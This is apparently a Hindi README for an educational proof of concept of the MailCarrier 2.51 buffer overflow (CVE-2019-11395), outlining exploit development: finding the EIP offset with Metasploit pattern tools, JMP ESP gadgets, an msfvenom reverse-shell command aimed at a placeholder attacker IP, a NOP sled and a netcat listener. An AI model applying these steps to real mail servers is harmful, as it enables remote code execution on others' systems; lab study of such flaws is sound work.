
शैक्षणिक उद्देश्य के साथ प्रमाण की अवधारणा जो CVE-2019-11395 को पृष्ठभूमि के रूप में उपयोग करके बफर ओवरफ्लो भेद्यता को समझने के लिए है
यह प्रूफ ऑफ कॉन्सेप्ट (PoC) MailCarrier 2.51 में एक बफर ओवरफ्लो कमजोरी को प्रदर्शित करता है, जो दूरस्थ हमलावरों को एक लंबी स्ट्रिंग के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देता है। इस कमजोरी का शोषण निम्नलिखित प्रक्रियाओं का उपयोग करके किया जा सकता है:
SMTP RCPT TOPOP3 USERPOP3 LISTPOP3 TOPPOP3 RETRयह परियोजना बफर ओवरफ्लो कैसे काम करता है, इसे समझने के लिए एक शैक्षणिक दृष्टिकोण प्रदान करने का लक्ष्य रखती है।
किसी भी परीक्षण को चलाने से पहले, प्रारंभिक प्रयोग के लिए अपने उत्पादन वातावरण का कभी उपयोग न करें। इसके बजाय, अपने उत्पादन वातावरण के समान एक प्रयोगशाला सेटअप बनाएं ताकि किसी भी समस्या या अनपेक्षित परिणामों से बचा जा सके।
msf-pattern_create -l <number_of_bytes>
यह ऑफ़सेट निर्धारित करने में मदद करता है, जो EIP को ओवरराइट करने के लिए आवश्यक सटीक बाइट्स की संख्या है।
msf-pattern_offset -q <bytes_on_EIP_register> -l <number_of_bytes>
यह EIP को नियंत्रित करने के लिए आवश्यक सटीक बाइट गिनती की पहचान करता है।
JMP ESP
CALL ESP
हम निष्पादन को पुनर्निर्देशित करने के लिए इस पते का उपयोग करेंगे। ASLR, SafeSEH या अन्य सुरक्षा तंत्रों से सावधान रहें।
msfvenom -p <shellcode> LHOST=<Attacker_IP> LPORT=443 -b "<badchars_list>" exitfunc=thread -f python
NOP (\x90) निर्देश डालें।netcat (nc) का उपयोग करें।